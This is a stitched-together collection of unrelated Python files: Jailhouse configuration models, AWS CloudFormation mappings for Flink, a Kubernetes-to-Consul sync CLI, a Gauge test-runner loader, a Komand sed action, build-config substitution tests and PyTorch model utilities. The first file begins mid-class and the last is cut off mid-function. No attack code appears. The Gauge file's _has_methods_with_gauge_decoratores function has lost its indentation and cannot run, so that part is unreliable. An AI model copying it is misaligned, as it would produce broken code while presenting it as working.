    """PCI platform description plus an architecture-specific part."""

    pci_mmconfig_end_bus: HexInt
    pci_is_virtual: bool
    pci_domain: int
    pci_mmconfig_base: Optional[HexInt]
    arch: Union[PlatformInfoArm, PlatformInfoX86, None] = None
class IRQChip(BaseModel):
    """Interrupt controller chip and the interrupt lines routed through it."""

    address: HexInt
    pin_base: int       # first interrupt number covered by this chip
    interrupts: IntegerList

    @property
    def pin_bitmap(self) -> List[str]:
        """Render ``interrupts`` as a list (at least 4 long) of 32-bit
        pin-bitmap words, each formatted as a C expression string.

        With more than 5 interrupts the words are computed numerically and
        emitted as hex literals; otherwise each word is a symbolic
        ``1 << (irq - base)`` OR-chain so the generated source stays
        readable.
        """
        SIZE = 32  # noqa
        count = 0
        res = []
        update = None
        store = None
        init: Union[None, str, int] = None
        pin_base = self.pin_base
        if len(self.interrupts) > 5:
            # Numeric variant: accumulate bits in an int, print as hex.
            def update(current_item, irq, count):
                # print("Update:", irq, pin_base, count)
                return current_item | 1 << (irq - (pin_base + count))

            def store(item):
                return "0x%x" % item

            init = 0
        else:
            # Symbolic variant: build a " | "-joined C expression per word.
            def update(current_item, irq, count):
                res = (
                    current_item
                    + ("" if not current_item else " | ")
                    + f"1 << ({irq} - {pin_base + count})"
                )
                return res

            def store(x):
                return "0x0" if x == "" else x

            init = ""
        current_item = init
        for irq in self.interrupts:
            # Advance to the 32-bit word containing this irq, flushing
            # completed words along the way (interrupts are processed in
            # list order; assumes ascending order — TODO confirm).
            while irq - pin_base >= count + SIZE:
                res.append(store(current_item))
                current_item = init
                count += SIZE
            current_item = update(current_item, irq, count)
        if current_item:
            res.append(store(current_item))
        # Pad with empty words so at least four are always returned.
        while len(res) < 4:
            res.append(store(init))
        return res
class PCIDevice(BaseModel):
    """PCI device assigned to a cell, addressed by domain and BDF."""

    type: str
    domain: int
    bdf: ExpressionInt  # encoded bus/device/function number
    bar_mask: str
    shmem_regions_start: Optional[int]
    shmem_dev_id: Optional[int]
    shmem_peers: Optional[int]
    shmem_protocol: Optional[str]

    # List of corresponding memory regions
    memory_regions: List[DeviceMemoryRegion] = []

    @property
    def bus(self) -> int:
        """Bus number decoded from the BDF."""
        return (int(self.bdf) >> 8) & 0xFF  # 8 Bits

    @property
    def device(self) -> int:
        """Device number decoded from the BDF."""
        return (int(self.bdf) >> 3) & 0x1F  # 5 Bits

    @property
    def function(self) -> int:
        """Function number decoded from the BDF."""
        return int(self.bdf) & 0x7  # 3 Bits
class CellConfig(BaseModel):
    """Configuration of a single cell: resources, devices and regions."""

    type: str          # e.g. "root" (see JailhouseConfig.root_cell)
    name: str
    vpci_irq_base: Optional[ExpressionInt]
    flags: List[str] = []
    network_renderer: Literal["interfaces", "cmdline"] = "interfaces"
    image: Optional[str] = None
    hypervisor_memory: Optional[HypervisorMemoryRegion]
    debug_console: Union[str, DebugConsole]
    platform_info: Optional[PlatformInfo]
    cpus: Optional[IntegerList]
    memory_regions: Optional[
        Dict[str, Union[str, ShMemNetRegion, MemoryRegion, DeviceMemoryRegion]]
    ] = {}
    irqchips: Optional[Dict[str, IRQChip]] = {}
    pci_devices: Optional[Dict[str, PCIDevice]] = {}
    image_path: Optional[Path] = None
class ShmemConfig(BaseModel):
    """Shared-memory communication link between a set of peer cells."""

    protocol: Literal[
        "SHMEM_PROTO_UNDEFINED", "SHMEM_VIRTIO_BACK", "SHMEM_PROTO_VETH"
    ]
    peers: List[str]
    common_output_region_size: Optional[ByteSize]
    per_device_region_size: Optional[ByteSize]
class InterfaceConfig(BaseModel):
    """Network interface with its IP addresses."""

    addresses: List[IPvAnyInterface]
    interface: Optional[str] = None
class ShmemConfigNet(ShmemConfig):
    """Shared-memory link restricted to the virtual-ethernet protocol."""

    protocol: Literal["SHMEM_PROTO_VETH"]
    network: Union[List[IPvAnyNetwork], Dict[str, InterfaceConfig]] = {}
class JailhouseConfig(BaseModel):
    """Top-level Jailhouse configuration: cells plus optional shmem links."""

    cells: Dict[str, CellConfig]
    shmem: Optional[Dict[str, Union[ShmemConfigNet, ShmemConfig]]] = None

    @property
    def root_cell(self) -> CellConfig:
        """Return the first cell whose type is "root"; raise if none exists."""
        for cell in self.cells.values():
            if cell.type == "root":
                return cell
        raise Exception("No root cell found")
if __name__ == "__main__":
    # Ad-hoc smoke test: parse a board description from the YAML file named
    # on the command line and pretty-print both the raw dict and the model.
    import sys
    from pprint import pprint

    import yaml

    with open(sys.argv[1]) as yaml_file:
        yaml_dict = yaml.safe_load(yaml_file)
    pprint(yaml_dict, indent=2)  # noqa
    board = Board(**yaml_dict)
    pprint(board, indent=2)  # noqa
|
"""
The MIT License (MIT)
Copyright (c) 2016 Paolo Smiraglia
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
Maps defined in
https://s3-us-west-2.amazonaws.com/cloudformation-templates-us-west-2/
EC2InstanceWithSecurityGroupSample.template
"""
# EC2 instance type -> virtualization/architecture flavor.
AWSInstanceType2Arch = {
    "t1.micro": {"Arch": "PV64"},
    "t2.nano": {"Arch": "HVM64"},
    "t2.micro": {"Arch": "HVM64"},
    "t2.small": {"Arch": "HVM64"},
    "t2.medium": {"Arch": "HVM64"},
    "t2.large": {"Arch": "HVM64"},
    "m1.small": {"Arch": "PV64"},
    "m1.medium": {"Arch": "PV64"},
    "m1.large": {"Arch": "PV64"},
    "m1.xlarge": {"Arch": "PV64"},
    "m2.xlarge": {"Arch": "PV64"},
    "m2.2xlarge": {"Arch": "PV64"},
    "m2.4xlarge": {"Arch": "PV64"},
    "m3.medium": {"Arch": "HVM64"},
    "m3.large": {"Arch": "HVM64"},
    "m3.xlarge": {"Arch": "HVM64"},
    "m3.2xlarge": {"Arch": "HVM64"},
    "m4.large": {"Arch": "HVM64"},
    "m4.xlarge": {"Arch": "HVM64"},
    "m4.2xlarge": {"Arch": "HVM64"},
    "m4.4xlarge": {"Arch": "HVM64"},
    "m4.10xlarge": {"Arch": "HVM64"},
    "c1.medium": {"Arch": "PV64"},
    "c1.xlarge": {"Arch": "PV64"},
    "c3.large": {"Arch": "HVM64"},
    "c3.xlarge": {"Arch": "HVM64"},
    "c3.2xlarge": {"Arch": "HVM64"},
    "c3.4xlarge": {"Arch": "HVM64"},
    "c3.8xlarge": {"Arch": "HVM64"},
    "c4.large": {"Arch": "HVM64"},
    "c4.xlarge": {"Arch": "HVM64"},
    "c4.2xlarge": {"Arch": "HVM64"},
    "c4.4xlarge": {"Arch": "HVM64"},
    "c4.8xlarge": {"Arch": "HVM64"},
    "g2.2xlarge": {"Arch": "HVMG2"},
    "g2.8xlarge": {"Arch": "HVMG2"},
    "r3.large": {"Arch": "HVM64"},
    "r3.xlarge": {"Arch": "HVM64"},
    "r3.2xlarge": {"Arch": "HVM64"},
    "r3.4xlarge": {"Arch": "HVM64"},
    "r3.8xlarge": {"Arch": "HVM64"},
    "i2.xlarge": {"Arch": "HVM64"},
    "i2.2xlarge": {"Arch": "HVM64"},
    "i2.4xlarge": {"Arch": "HVM64"},
    "i2.8xlarge": {"Arch": "HVM64"},
    "d2.xlarge": {"Arch": "HVM64"},
    "d2.2xlarge": {"Arch": "HVM64"},
    "d2.4xlarge": {"Arch": "HVM64"},
    "d2.8xlarge": {"Arch": "HVM64"},
    "hi1.4xlarge": {"Arch": "HVM64"},
    "hs1.8xlarge": {"Arch": "HVM64"},
    "cr1.8xlarge": {"Arch": "HVM64"},
    "cc2.8xlarge": {"Arch": "HVM64"}
}

# The NAT table is exactly the same mapping with "NAT" prefixed to every
# arch value, so derive it instead of duplicating all 53 entries.
AWSInstanceType2NATArch = {
    instance_type: {"Arch": "NAT" + arch["Arch"]}
    for instance_type, arch in AWSInstanceType2Arch.items()
}
# Region -> AMI id for each supported virtualization/architecture flavor.
AWSRegionArch2AMI = {
    "us-east-1": {"PV64": "ami-2a69aa47", "HVM64": "ami-6869aa05",
                  "HVMG2": "ami-2e5e9c43"},
    "us-west-2": {"PV64": "ami-7f77b31f", "HVM64": "ami-7172b611",
                  "HVMG2": "ami-83b770e3"},
    "us-west-1": {"PV64": "ami-a2490dc2", "HVM64": "ami-31490d51",
                  "HVMG2": "ami-fd76329d"},
    "eu-west-1": {"PV64": "ami-4cdd453f", "HVM64": "ami-f9dd458a",
                  "HVMG2": "ami-b9bd25ca"},
    "eu-central-1": {"PV64": "ami-6527cf0a", "HVM64": "ami-ea26ce85",
                     "HVMG2": "ami-7f04ec10"},
    "ap-northeast-1": {"PV64": "ami-3e42b65f", "HVM64": "ami-374db956",
                       "HVMG2": "ami-e0ee1981"},
    "ap-northeast-2": {"PV64": "NOT_SUPPORTED", "HVM64": "ami-2b408b45",
                       "HVMG2": "NOT_SUPPORTED"},
    "ap-southeast-1": {"PV64": "ami-df9e4cbc", "HVM64": "ami-a59b49c6",
                       "HVMG2": "ami-0cb5676f"},
    "ap-southeast-2": {"PV64": "ami-63351d00", "HVM64": "ami-dc361ebf",
                       "HVMG2": "ami-a71c34c4"},
    "sa-east-1": {"PV64": "ami-1ad34676", "HVM64": "ami-6dd04501",
                  "HVMG2": "NOT_SUPPORTED"},
    "cn-north-1": {"PV64": "ami-77559f1a", "HVM64": "ami-8e6aa0e3",
                   "HVMG2": "NOT_SUPPORTED"}
}
# Flink distribution catalog: version/hadoop/scala flavor -> unpacked
# directory name and binary tarball URL.  Every entry follows the same
# naming scheme, so the table is generated instead of spelled out
# (3 versions x 4 hadoop flavors x 2 scala versions = 24 entries).
_FLINK_VERSIONS = ("1.1.1", "1.1.0", "1.0.3")
_FLINK_HADOOP_FLAVORS = ("27", "26", "24", "2")
_FLINK_SCALA_VERSIONS = ("2.11", "2.10")

FlinkVersion2Env = {
    "flink{v}-hadoop{h}-scala{s}".format(v=v, h=h, s=s): {
        "dirname": "flink-{v}".format(v=v),
        "binurl": (
            "http://www-us.apache.org/dist/flink/flink-{v}/"
            "flink-{v}-bin-hadoop{h}-scala_{s}.tgz"
        ).format(v=v, h=h, s=s),
    }
    for v in _FLINK_VERSIONS
    for h in _FLINK_HADOOP_FLAVORS
    for s in _FLINK_SCALA_VERSIONS
}
# CIDR blocks for the Flink VPC and its private/public subnets.
FlinkCidrBlock = {
    "private": {"CIDR": "10.77.0.0/24"},
    "public": {"CIDR": "10.77.1.0/24"},
    "vpc": {"CIDR": "10.77.0.0/16"},
}

# Region -> NAT instance AMI id ("NOT-AVAILABLE" where none exists).
AWSNATAMI = {
    "ap-northeast-1": {"AMI": "ami-c7e016c7"},
    "ap-northeast-2": {"AMI": "NOT-AVAILABLE"},
    "ap-south-1": {"AMI": "NOT-AVAILABLE"},
    "ap-southeast-1": {"AMI": "ami-b098a9e2"},
    "ap-southeast-2": {"AMI": "ami-0fed9d35"},
    "eu-central-1": {"AMI": "ami-3604392b"},
    "eu-west-1": {"AMI": "ami-cb7de3bc"},
    "sa-east-1": {"AMI": "ami-93fb408e"},
    "us-east-1": {"AMI": "ami-c02b04a8"},
    "us-west-1": {"AMI": "ami-67a54423"},
    "us-west-2": {"AMI": "ami-2dae821d"},
}
def add_mappings(t):
    """Register every module-level mapping table on template *t*."""
    mappings = (
        ("AWSInstanceType2Arch", AWSInstanceType2Arch),
        ("AWSInstanceType2NATArch", AWSInstanceType2NATArch),
        ("AWSNATAMI", AWSNATAMI),
        ("AWSRegionArch2AMI", AWSRegionArch2AMI),
        ("FlinkCidrBlock", FlinkCidrBlock),
        ("FlinkVersion2Env", FlinkVersion2Env),
    )
    for name, mapping in mappings:
        t.add_mapping(name, mapping)
|
import schedule
import time
import click
from configmap2consul.configmap2consul import configmap_2_consul, logging, init_consul_client
# Module-level logger with a timestamped format, INFO level by default.
log = logging.getLogger("cli")
log_format = "%(asctime)s | %(levelname)9s | %(message)s"
logging.basicConfig(format=log_format, level=logging.INFO)

# Make "-h" work as an alias for "--help" on the click command.
CLICK_CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
@click.command(context_settings=CLICK_CONTEXT_SETTINGS)
@click.option('--namespace', '-n',
              required=True,
              type=str,
              default="default",
              help='Kubernetes Configmap Namespace')
@click.option('--interval', '-i',
              required=True,
              type=int,
              default=5,
              show_default=True,
              help="Polling interval, if -1 will run once and quit")
@click.option('--labels', '-l',
              required=False,
              type=str,
              help="Labels to filter kubernetes configmap")
@click.option('--consul_url', '-c',
              required=True,
              type=str,
              default="http://localhost:8500",
              help="Consul endpoint: e.g https://myconsul.mydomain.org:8500")
@click.option('--basepath', '-p',
              required=True,
              type=str,
              default="test",
              help="Consul path for stored K/V")
@click.option('--separator', '-s',
              required=False,
              default="::",
              type=str,
              help="token separator for profile version (spring mode only)")
@click.option("--dryrun", "-d",
              is_flag=True,
              help="Do not create consul data")
def main(namespace=None, interval=None, labels=None, consul_url=None, basepath=None, separator=None, dryrun=None):
    """Sync Kubernetes ConfigMaps into Consul, once or on a schedule.

    With ``--interval -1`` the sync runs a single time and exits;
    otherwise it runs immediately and is then repeated every *interval*
    seconds forever.
    """
    consul_client = init_consul_client(consul_url)

    def sync():
        # One sync pass; shared by the single-run and scheduled modes
        # (the original duplicated this six-argument call in both).
        configmap_2_consul(
            namespace,
            labels,
            consul_client,
            basepath,
            separator,
            dryrun)

    if interval == -1:
        log.info("Single run mode")
        sync()
    else:
        log.info("Scheduled run mode")
        # run first
        sync()
        # schedule next
        schedule.every(interval).seconds.do(sync)
        while True:
            schedule.run_pending()
            time.sleep(1)
if __name__ == "__main__":
    # click parses the CLI options and invokes main().
    main()
|
import importlib
import inspect
import json
import re
import shutil
import sys
import traceback
from os import path
from getgauge import logger
from getgauge.registry import registry
from getgauge.util import *
# Resolve the Gauge project layout once at import time.
project_root = get_project_root()
impl_dirs = get_step_impl_dirs()
env_dir = os.path.join(project_root, 'env', 'default')
requirements_file = os.path.join(project_root, 'requirements.txt')

# Make project modules importable for step-implementation loading.
sys.path.append(project_root)

PLUGIN_JSON = 'python.json'        # plugin metadata file
VERSION = 'version'                # key inside PLUGIN_JSON
PYTHON_PROPERTIES = 'python.properties'
SKEL = 'skel'                      # directory holding skeleton files
def load_impls(step_impl_dirs=impl_dirs):
    """Import every step-implementation module under *step_impl_dirs*.

    Aborts with an error log on the first directory that does not exist.
    """
    os.chdir(project_root)
    for impl_dir in step_impl_dirs:
        if not os.path.isdir(impl_dir):
            # Report the directory that is actually missing (the original
            # message printed the whole list instead of the bad entry).
            logger.error('Cannot import step implementations. Error: {} does not exist.'.format(impl_dir))
            logger.error('Make sure `STEP_IMPL_DIR` env var is set to a valid directory path.')
            return
        # Modules are imported relative to the project root when the impl
        # dir lives inside it, else relative to the impl dir's parent.
        base_dir = project_root if impl_dir.startswith(project_root) else os.path.dirname(impl_dir)
        _import_impl(base_dir, impl_dir)
def copy_skel_files():
    """Create the skeleton Gauge Python project: env dir, step-impl dir,
    python.properties and a pinned requirements.txt."""
    try:
        logger.info('Initialising Gauge Python project')
        logger.info('create {}'.format(env_dir))
        os.makedirs(env_dir)
        logger.info('create {}'.format(impl_dirs[0]))
        shutil.copytree(os.path.join(SKEL, path.basename(impl_dirs[0])), impl_dirs[0])
        logger.info('create {}'.format(os.path.join(env_dir, PYTHON_PROPERTIES)))
        shutil.copy(os.path.join(SKEL, PYTHON_PROPERTIES), env_dir)
        # Pin the runner version so `pip install -r requirements.txt`
        # matches the plugin that generated the project.
        with open(requirements_file, 'w') as f:
            f.write('getgauge==' + _get_version())
    except Exception:
        # A bare `except:` would also swallow SystemExit/KeyboardInterrupt.
        logger.fatal('Exception occurred while copying skel files.\n{}.'.format(traceback.format_exc()))
def _import_impl(base_dir, step_impl_dir):
    """Recursively import all ``*.py`` files found under *step_impl_dir*."""
    for entry in os.listdir(step_impl_dir):
        full_path = os.path.join(step_impl_dir, entry)
        if entry.endswith('.py'):
            _import_file(base_dir, full_path)
        elif path.isdir(full_path):
            _import_impl(base_dir, full_path)
def _import_file(base_dir, file_path):
    """Import one step-implementation file and register its classes.

    The module name is derived from the path relative to *base_dir* so that
    packages inside the project import consistently.
    """
    rel_path = os.path.normpath(file_path.replace(base_dir + os.path.sep, ''))
    try:
        module_name = os.path.splitext(rel_path.replace(os.path.sep, '.'))[0]
        m = importlib.import_module(module_name)
        # Only consider classes defined in this module (not re-exported ones).
        classes = inspect.getmembers(m, lambda member: inspect.isclass(member) and member.__module__ == module_name)
        for c in classes:
            # Instantiate only classes that actually carry gauge-decorated methods.
            if _has_methods_with_gauge_decoratores(c[1]):
                update_step_resgistry_with_class(c[1](), file_path)  # c[1]() creates a new instance of the class
    except Exception:
        # Bug fix: the message had one '{}' but two format() args, so the
        # traceback was silently dropped from the log. Also narrowed the bare
        # `except:` so SystemExit/KeyboardInterrupt propagate.
        logger.fatal('Exception occurred while loading step implementations from file: {}.\n{}'.format(rel_path, traceback.format_exc()))
# Inject instance into each class method (hook/step)
def update_step_resgistry_with_class(instance, file_path):
    """Attach *instance* to every registered step/hook implemented as one of its methods."""
    # Perf fix: hoisted out of the loop — the method set of `instance` does not
    # change per registered step, and a set gives O(1) membership tests.
    class_methods = {x[0] for x in inspect.getmembers(instance, inspect.ismethod)}
    for info in registry.get_all_methods_in(file_path):
        if info.impl.__name__ in class_methods:
            info.instance = instance
def _get_version():
    """Return the plugin version declared in python.json."""
    # Resource fix: the file handle was previously opened and never closed.
    with open(PLUGIN_JSON) as f:
        return json.load(f)[VERSION]
def _has_methods_with_gauge_decoratores(klass):
foo = r"@(step|before_suite|after_suite|before_scenario|after_scenario|before_spec|after_spec|before_step|after_step|screenshot|custom_screen_grabber)"
sourcelines = inspect.getsourcelines(klass)[0]
for i,line in enumerate(sourcelines):
if re.match(foo, line.strip()) != None:
return True
|
import komand
from .schema import ProcessStringInput, ProcessStringOutput, Input, Output
# Custom imports below
from komand_sed.util.helper import Helper
class ProcessString(komand.Action):
    """Komand action that runs a list of sed expressions over an input string."""

    def __init__(self):
        super(self.__class__, self).__init__(
            name='process_string',
            description='Process string',
            input=ProcessStringInput(),
            output=ProcessStringOutput())

    def run(self, params={}):
        """Apply the configured sed expressions/options and return the result."""
        raw = params.get(Input.STRING).encode()
        expressions = params.get(Input.EXPRESSION)
        options = params.get(Input.OPTIONS)
        processed = Helper.process(raw, expressions, options)
        return {Output.OUTPUT: processed.decode("utf-8")}
|
# coding=utf-8
#
# pylint: disable = missing-docstring
"""
Copyright (c) 2021, Alexander Magola. All rights reserved.
license: BSD 3-Clause License, see LICENSE for more details.
"""
import pytest
from zm.buildconf.processing import ConfManager
CONF_HEADER_YML = """
fragment1: |
program
end program
fragment2: |
program
$MYFLAGS
end program
GCC_BASE_CXXFLAGS: -std=c++11 -fPIC
MYFLAGS: -O2 -g
MYFLAGS1: $MYFLAGS -Wall -Wextra
MYFLAGS2: -Wall $MYFLAGS -Wextra
MYFLAGS3: -Wall -Wextra $MYFLAGS
MYFLAGS4: ${MYFLAGS} -Wall -Wextra
MYFLAGS5: -Wall ${MYFLAGS} -Wextra
MYFLAGS6: -Wall -Wextra ${MYFLAGS}
AFLAGS1: $$GCC_BASE_CXXFLAGS -Wall ${MYFLAGS} -Wextra
AFLAGS2: "$GCC_BASE_CXXFLAGS -Wall $${MYFLAGS} -Wextra"
AFLAGS3: '$GCC_BASE_CXXFLAGS -Wall ${MYFLAGS} -Wextra'
"""
CONF_BODY_YML = """
buildtypes:
debug1: { cxxflags: $MYFLAGS1 -O0 }
debug2:
cxxflags: ${MYFLAGS2} -O0
debug3: { cxxflags: $$MYFLAGS3 -O0 }
debug3:
cxxflags: ${MYFLAGS3} -O0
debug4: { cxxflags: "$MYFLAGS4 -O0" }
debug5: { cxxflags: "${MYFLAGS5} -O0" }
debug6: { cxxflags: '${MYFLAGS6} -O0' }
release1 : { cxxflags: $AFLAGS1 -O2 }
release2 : { cxxflags: $AFLAGS2 -O2 }
release3 : { cxxflags: $AFLAGS3 -O2 }
tasks:
util :
features : cxxshlib
source : 'shlib/**/*.cpp'
configure:
- do: check-code
text: $fragment1
label: fragment1
- do: check-code
text: $fragment2
label: fragment2
prog :
features : cxxprogram
source : 'prog/**/*.cpp'
use : util
"""
ROOT_CONF_YML = CONF_HEADER_YML + CONF_BODY_YML
SUBDIR_LVL1 = 'lib'
SUBDIR_LVL2 = 'core'
ROOT_SUBDIRS_YAML = """
%s
subdirs: [ %s ]
""" % (CONF_HEADER_YML, SUBDIR_LVL1)
MIDDLE_SUBDIRS_YML = """
subdirs: [ %s ]
""" % SUBDIR_LVL2
LAST_SUBDIRS_YAML = CONF_BODY_YML
def checkVars(bconf, dbgValidVals, relValidVals):
    """Assert every debugN/releaseN buildtype carries the expected cxxflags.

    Flags may arrive as a plain string or as a split token list, and may be
    wrapped in a config-value object exposing the value through ``.val``.
    """
    buildtypes = bconf.getattr('buildtypes')[0]

    def _cxxflags(buildtype):
        flags = buildtypes[buildtype]['cxxflags']
        # Unwrap value objects; plain strings/lists pass through unchanged.
        return getattr(flags, 'val', flags)

    for num in range(1, 7):
        expected = dbgValidVals[num - 1]
        assert _cxxflags('debug%d' % num) in (expected, expected.split())
    for num in range(1, 4):
        expected = relValidVals[num - 1]
        assert _cxxflags('release%d' % num) in (expected, expected.split())
def checkConfigNoEnv(bconf):
    """Expected substitution results when no MYFLAGS* env vars are set."""
    expectedDebug = [
        "-O2 -g -Wall -Wextra -O0",
        "-Wall -O2 -g -Wextra -O0",
        "-Wall -Wextra -O2 -g -O0",
        "-O2 -g -Wall -Wextra -O0",
        "-Wall -O2 -g -Wextra -O0",
        "-Wall -Wextra -O2 -g -O0",
    ]
    # All three release buildtypes expand to the same flags.
    expectedRelease = ["-std=c++11 -fPIC -Wall -O2 -g -Wextra -O2"] * 3
    checkVars(bconf, expectedDebug, expectedRelease)
    # The check-code fragments must come through with $MYFLAGS expanded.
    configure = bconf.tasks['util']['configure']
    assert configure[0]['text'] == "program\nend program\n"
    assert configure[1]['text'] == "program\n-O2 -g\nend program\n"
def checkConfigWithEnv(bconf):
    """Expected substitution results when MYFLAGS/MYFLAGS3 come from the environment."""
    expectedDebug = [
        "-O3 -Wall -Wall -Wextra -O0",
        "-Wall -O3 -Wall -Wextra -O0",
        "-O1 -Wall -Wextra -O0",
        "-O3 -Wall -Wall -Wextra -O0",
        "-Wall -O3 -Wall -Wextra -O0",
        "-Wall -Wextra -O3 -Wall -O0",
    ]
    expectedRelease = [
        "-std=c++11 -fPIC -Wall -O3 -Wall -Wextra -O2",
        "-std=c++11 -fPIC -Wall -O2 -g -Wextra -O2",
        "-std=c++11 -fPIC -Wall -O3 -Wall -Wextra -O2",
    ]
    checkVars(bconf, expectedDebug, expectedRelease)
@pytest.mark.usefixtures("unsetEnviron")
def testBasic(tmpdir, monkeypatch):
    """Single buildconf.yml: substitution without and with env overrides."""
    cliArgs = {'buildtype': 'debug1'}
    testDir = tmpdir.mkdir("test")
    testDir.join("buildconf.yml").write(ROOT_CONF_YML)
    rootPath = str(testDir.realpath())

    # Without environment overrides.
    manager = ConfManager(rootPath, clivars=cliArgs, clihandler=None)
    checkConfigNoEnv(manager.root)

    # With environment overrides taking precedence over the YAML vars.
    monkeypatch.setenv('MYFLAGS', '-O3 -Wall')
    monkeypatch.setenv('MYFLAGS3', '-O1 -Wall -Wextra')
    manager = ConfManager(rootPath, clivars=cliArgs, clihandler=None)
    checkConfigWithEnv(manager.root)
@pytest.mark.usefixtures("unsetEnviron")
def testSubdirs(tmpdir, monkeypatch):
    """Nested subdirs layout: vars declared at the root reach the leaf config."""
    cliArgs = {'buildtype': 'debug1'}
    testDir = tmpdir.mkdir("test")
    testDir.join("buildconf.yml").write(ROOT_SUBDIRS_YAML)
    lvl1 = testDir.mkdir(SUBDIR_LVL1)
    lvl1.join("buildconf.yml").write(MIDDLE_SUBDIRS_YML)
    lvl2 = lvl1.mkdir(SUBDIR_LVL2)
    lvl2.join("buildconf.yml").write(LAST_SUBDIRS_YAML)
    rootPath = str(testDir.realpath())

    # Without environment overrides; the leaf config is the last one loaded.
    manager = ConfManager(rootPath, clivars=cliArgs, clihandler=None)
    checkConfigNoEnv(manager.configs[-1])

    # With environment overrides.
    monkeypatch.setenv('MYFLAGS', '-O3 -Wall')
    monkeypatch.setenv('MYFLAGS3', '-O1 -Wall -Wextra')
    manager = ConfManager(rootPath, clivars=cliArgs, clihandler=None)
    checkConfigWithEnv(manager.configs[-1])
|
from functools import partial
from itertools import chain, islice, tee
import gym
import IPython
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn.modules.module import _addindent
from context import utils
from utils.torchutils import summarize_model, calculate_xavier_gain
def model_weight_initializer(model):
    """Initialise *model*'s weights in place (He-style for conv, N(0, 0.01) for
    linear, identity-at-start for batch norm).

    Bug fixes: removed an IPython.embed() debug breakpoint that fired on every
    module, and removed the gain lookup whose `nn.init.calculate_gain(next_module)`
    call (a module object where a nonlinearity name is expected) always raised,
    so the bare `except: continue` silently skipped ALL initialisation. The
    unused current/next iterator helpers went with it.
    """
    for module in model.modules():
        if isinstance(module, nn.Conv2d):
            # He init: variance scaled by fan-out of the kernel.
            n = module.kernel_size[0] * module.kernel_size[1] * module.out_channels
            module.weight.data.normal_(0, np.sqrt(2. / n))
            if module.bias is not None:
                module.bias.data.zero_()
        elif isinstance(module, nn.BatchNorm2d):
            # Start as the identity transform.
            module.weight.data.fill_(1)
            module.bias.data.zero_()
        elif isinstance(module, nn.Linear):
            module.weight.data.normal_(0, 0.01)
            module.bias.data.zero_()
def capsule_softmax(input, dim=1):
    """Softmax over dimension *dim* of a tensor of any rank.

    Implemented by moving *dim* to the end, flattening to 2-D, applying
    softmax over the last axis, then undoing the reshape/transpose.
    """
    transposed = input.transpose(dim, input.dim() - 1)
    flat = transposed.contiguous().view(-1, transposed.size(-1))
    # Fix: pass `dim` explicitly — the implicit-dim form of F.softmax is
    # deprecated; dim=1 on the flattened 2-D view matches the old behaviour.
    softmaxed = F.softmax(flat, dim=1)
    return softmaxed.view(*transposed.size()).transpose(dim, input.dim() - 1)
class IdentityFunction(nn.Module):
    """No-op activation: returns its input unchanged.

    Useful where the architecture expects an activation module but none is wanted.
    """

    def __init__(self):
        super(IdentityFunction, self).__init__()

    def forward(self, x):
        """Pass *x* through untouched."""
        return x
class AbstractESModel(nn.Module):
    """Abstract base class for models trained by evolutionary strategies.

    Provides parameter/gradient norms and counting of parameters, tensors and
    layers. The counting methods rely on the project's `summarize_model`
    helper and require subclasses to set ``self.in_dim``.
    """

    def parameter_norm(self):
        """Return the L2 norm of all parameters."""
        total = 0
        for p in self.parameters():
            total += (p.data.view(-1) @ p.data.view(-1))
        return np.sqrt(total)

    def gradient_norm(self):
        """Return the L2 norm of all gradients, or None if any gradient is missing."""
        total = 0
        for p in self.parameters():
            if p.grad is None:
                # Bug fix: the old code only `break`ed here and then called
                # np.sqrt(None), raising TypeError instead of returning None.
                return None
            total += (p.grad.data.view(-1) @ p.grad.data.view(-1))
        return np.sqrt(total)

    @property
    def summary(self):
        # Computed once and cached; needs `self.in_dim` set by the subclass.
        if not hasattr(self, '_summary'):
            self._summary = summarize_model(self, self.in_dim)
        return self._summary

    def count_parameters(self, only_trainable=True):
        """Return the number of [trainable] parameters in this model."""
        return self._count_parameters(self, only_trainable=only_trainable)

    @staticmethod
    def _count_parameters(m, only_trainable=True):
        """Count the number of [trainable] parameters in a pytorch model."""
        k = 'n_trainable' if only_trainable else 'n_parameters'
        return int(m.summary[k].sum())

    def count_tensors(self, only_trainable=True):
        """Return the number of [trainable] weight tensors in this model."""
        return self._count_tensors(self, only_trainable=only_trainable)

    @staticmethod
    def _count_tensors(m, only_trainable=True):
        """Count the number of [trainable] tensor objects in a pytorch model."""
        k = 'n_trainable' if only_trainable else 'n_parameters'
        return sum([1 for i, l in m.summary.iterrows() for w in l['weight_shapes'] if l['weight_shapes'] and l[k] > 0])

    def count_layers(self, only_trainable=True):
        """Count the number of [trainable] layers in a pytorch model.

        A layer is defined as a module with a nonzero number of [trainable]
        parameters.
        """
        return self._count_layers(self, only_trainable=only_trainable)

    @staticmethod
    def _count_layers(m, only_trainable=True):
        k = 'n_trainable' if only_trainable else 'n_parameters'
        return m.summary[m.summary[k] > 0].shape[0]

    def _initialize_weights(self):
        """Xavier-initialise weights, zero biases, and reset batch-norm stats.

        Modules are visited in reverse so the nonlinearity following a layer
        is seen before the layer itself when computing the gain.
        """
        modules = list(self.modules())
        for m in reversed(modules):
            try:
                gain = calculate_xavier_gain(m.__class__)
            except Exception:
                # Modules without an associated gain (containers etc.) use 1.
                gain = 1
            if isinstance(m, nn.Conv1d) or isinstance(m, nn.Conv2d) or isinstance(m, nn.Conv3d):
                assert gain == calculate_xavier_gain(nn.Conv1d)
                # NOTE(review): nn.init.xavier_normal is deprecated in favour of
                # xavier_normal_; kept for behaviour parity with this codebase.
                nn.init.xavier_normal(m.weight.data, gain=gain)
                if m.bias is not None:
